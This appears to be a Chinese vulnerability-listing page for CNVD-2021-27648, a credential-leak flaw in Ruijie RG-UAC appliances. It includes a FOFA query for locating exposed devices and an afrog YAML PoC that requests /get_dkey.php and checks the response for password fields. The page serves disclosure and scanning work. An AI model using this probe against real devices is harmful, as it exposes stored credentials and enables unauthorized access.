CNVD-2021-27648: Ruijie RG-UAC Information Leakage Vulnerability

日期: 2025-08-01 | 影响软件: Ruijie RG-UAC | POC: 已公开

漏洞描述

锐捷RG-UAC锐捷统一上网行为管理与审计系统存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。 fofa: title="RG-UAC登录页面"

PoC代码[已公开]

id: CNVD-2021-27648

info:
  name: Ruijie RG-UAC Information Leakage Vulnerability
  author: doinb1517
  severity: critical
  verified: true
  description: |-
    锐捷RG-UAC锐捷统一上网行为管理与审计系统存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。
    fofa: title="RG-UAC登录页面"
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-27648
  tags: cnvd,cnvd2021,ruijie,leakage
  created: 2023/07/07

rules:
  r0:
    request:
      method: GET
      path: /get_dkey.php
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"password":') && 
      response.body.bcontains(b'"pre_define":') && 
      response.body.bcontains(b'"auth_method":') && 
      response.body.bcontains(b'"dkey_password":')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2021/CNVD-2021-27648.yaml

相关漏洞推荐